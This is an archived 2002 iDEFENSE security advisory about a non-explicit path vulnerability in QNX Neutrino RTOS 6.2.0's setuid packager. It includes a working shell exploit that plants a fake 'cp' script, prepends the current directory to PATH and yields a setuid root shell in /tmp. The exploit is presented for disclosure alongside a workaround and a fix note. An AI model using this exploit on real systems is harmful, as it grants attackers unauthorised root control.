lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <3DCBE076.10587.1833B774@localhost>
From: dendler at idefense.com (David Endler)
Subject: iDEFENSE Security Advisory 11.08.02b: Non-Explicit Path Vulnerability in QNX Neutrino RTOS

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 11.08.02b:
http://www.idefense.com/advisory/11.08.02b.txt
Non-Explicit Path Vulnerability in QNX Neutrino RTOS
November 8, 2002

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time
operating system designed for use in embedded systems. "Companies
worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on
the QNX technology for network routers, medical devices, intelligent
transportation systems, safety and security systems, next-generation
robotics, and other mission-critical applications. In addition, QNX
forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an
engineering concept vehicle. The new system supports the development
of next-generation in-car communications, infotainment, and
telematics applications." More information is available at
http://www.qnx.com/products/ps_neutrino .

II. DESCRIPTION

Since a setuid root application packager within QNX inappropriately
executes external applications without using their full paths, local
attackers can potentially obtain root privilege. The following is a
sample exploit (with comments):

The packager will at one point call the copy binary (cp). The first
step is to create a tainted copy command and ensure it is executable.
This copy command will copy a shell to /tmp and give the shell setuid
privilege:

$ cat > cp <<EOF
> #!/bin/sh
> /bin/cp /bin/sh /tmp/sh
> chmod 4755 /tmp/sh
> EOF
$ chmod 755 cp 

The attacker then modifies the PATH environment variable to search
the current working directory before anything else:

$ PATH=$PWD:$PATH 

The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp
...

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh

III. ANALYSIS

Local attackers that exploit this vulnerability can potentially gain
total control over a targeted system. The fact that exploitation must
be done locally makes it more unlikely that damage can be done
quickly or in a widespread fashion. Still for organizations that may
still be making use of QNX, insider threat is still a real danger.

IV. DETECTION

QNX Neutrino RTOS 6.2.0 is affected. Re-create the above-described
exploit scenario to determine susceptibility of a RTOS
implementation.

V. WORKAROUND

Use the command chmod -s 'which packager' to remove the setuid bit
from the packager binary.

VI. VENDOR FIX

QNX Neutrino RTOS 6.2.1, which is slated to be released in January
2002, should fix this vulnerability. According to QNX, concerned
customers can contact their sales rep for an advance copy.
 
VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1239 to this issue.

VIII. DISCLOSURE TIMELINE

10/02/2002	Issue disclosed to iDEFENSE
10/31/2002	QNX notified (support@....com)
10/31/2002	iDEFENSE clients notified
11/01/2002	Response received from Marcin Dzieciol (marcind@....com)
11/07/2002	Response received from Rodney Dowdell
11/08/2002	Phone conversation with Barry Faubert, Tech Support
11/08/2002	Public disclosure

IX. CREDIT

Texonet (http://www.texonet.com) discovered this vulnerability.


Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@...fense.com, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide 
decision-makers, frontline security professionals and network 
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@...fense.com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA+AwUBPcwmZUrdNYRLCswqEQIZkQCYq0OO58lTS6Ib+q26PSx085XXqgCfWPhd
F5wgy3retkUyneTrZbtG4pk=
=rZxj
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ